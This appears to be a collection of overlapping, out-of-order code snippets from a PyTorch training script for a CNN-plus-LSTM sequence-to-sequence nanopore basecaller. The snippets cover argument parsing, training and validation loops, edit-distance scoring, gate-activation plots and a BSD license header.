"\"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val +",
"np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u]",
"end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) #",
"at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\",",
"default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number",
"n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1))",
"# ed2 = ed # else: # ed = 0 # ed2 =",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance",
"outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature)",
"acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val)",
"gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size =",
"decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have",
"= nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim * 2)",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1,",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"max_in_batch: break # when seq length (i) >= true seq length if i",
"label=\"training edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from",
"attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder:",
"ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1,",
"#print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy,",
"\"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for",
"i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1,",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val],",
"editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation",
"x seq_length x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: #",
"n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc",
"epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())),",
"mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of",
"clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds",
"seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode)",
"if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs):",
"== max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular",
"= args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability =",
"args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on",
"args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd = False",
"self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda",
"= args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm",
"output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim =",
"= x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items",
"disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE",
"editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem,",
"* 2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn =",
"EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\")",
"idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target = target[idx]",
"validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close()",
"on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda",
"stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val",
"\"bias\" in name and \"lstm\" in name and \"linear\" not in name: for",
"= {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc =",
"update= \", updates, \", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward",
"0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate,",
"seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode)",
"default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size',",
"DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,",
"time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds =",
":, :] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def",
"size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make",
"The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder,",
"shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader",
"epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val",
"else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates)",
"\"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases]",
"rights reserved. Redistribution and use in source and binary forms, with or without",
"Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig,",
"\"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end",
"= args.batch_norm dropout_on = args.dropout_cnn dropout_input = args.dropout_input dropout_probability = args.drop_prob call =",
"save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0]",
"'--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1,",
"target[idx] encoded_pred = [] for p in seq: if p == 4: break",
"0.0 updates = 0 heatmap_g = None heatmap_w = None heatmap_g_b = None",
"(updates % make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF: #if",
"print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss /",
"dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates)",
"# cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate,",
"# self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters():",
"hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1)",
"= F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are",
"type=int, default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation',",
"args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out",
"output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder =",
"= 0 # ed2 = old_ed # # old_ed = ed2 # epoch_editd",
"acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val",
"self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim,",
"input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim",
"hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias =",
"def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder",
"if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in name",
"wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\", \"forget gate\",",
"end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] =",
"trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train],",
"loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start = start self.end = end",
"max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val],",
"dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2,",
"lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim] # shape of",
"checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop:",
"{:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) *",
"= int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token =",
"smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get",
"lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim",
"np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings",
"signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5]))",
"{} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0",
"print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] =",
"updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2",
"loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc",
"EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" +",
"4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size)",
").sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val,",
"x, hidden): h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0),",
"read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10,",
"<= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required",
"of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train",
"max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through",
"plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b",
":] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches,",
"* n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and",
"of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and",
"import itertools import seaborn as sns import pandas as pd import argparse from",
"as nn from torch.autograd import Variable import torch.nn.functional as F import torchvision import",
"input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD)",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None:",
"Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)),",
"= list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases",
":] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort",
"args.input_bias_cnn strides = args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type =",
"SOS token = 1 [batch size, SOS token] for i in max_for: #",
"= torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x,",
"= data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val,",
"hidden): h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1)",
"label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax",
"= os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile print(file_out)",
"lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir,",
"# early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience",
"self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear",
"Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output,",
"0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else:",
"verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell =",
"half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value =",
"gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate",
"is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val",
"attention = args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides =",
"cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0, n//4 #",
"shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab",
"# shape of lstm_in: [batch, input_dim] # shape of lstm_out: [seq_len, batch, output_dim]",
"in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val =",
"n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end =",
"= dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm",
"out_dim) #decide if we are going to use teacher forcing or not teacher_force",
"print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile",
"df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2",
"criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path +",
"torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder",
"else onehot # [batch size, out dim] return outputs, hidden # Sequence to",
"#Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break",
"epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item()",
"/ reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref",
"dict_validation_acc[epoch] = val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation",
"random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0:",
"gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2,",
"= {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0 running_loss_val =",
"inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder #############################",
"seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden",
"BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use",
"dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1]",
"and decoder must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None,",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases =",
"of conditions and the following disclaimer in the documentation and/or other materials provided",
"zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2] lab_len =",
"= torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset,",
"(<EMAIL>) All rights reserved. Redistribution and use in source and binary forms, with",
"* c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size())",
"= h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear",
"what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size,",
"editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check if",
"shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2],",
"top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\",",
"ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training",
"args.output port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs",
"code must retain the above copyright notice, this list of conditions and the",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True)",
"decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip',",
"arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability",
"{count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\")",
"channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type',",
"/ float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)),",
"+= ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if",
"Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates]",
"#writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation)",
"----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size",
"of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\",",
"weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget",
"# shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b),",
"= {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 =",
"super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h =",
"default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers",
"svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def",
"= 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss",
"dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in model.parameters() if",
"with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\"",
"(i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1:",
"= args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel = args.kernel",
"# Define the output layer if self.bidirectional: if self.attention: # attention self.attn =",
"clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop,",
"in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target =",
"the validation loss to check if it has decresed, # and if it",
"Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int,",
"hidden_dim). # Sort instances by sequence length in descending order #print(\"in length\", x_lengths)",
"sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False,",
"ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with order in",
"running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] =",
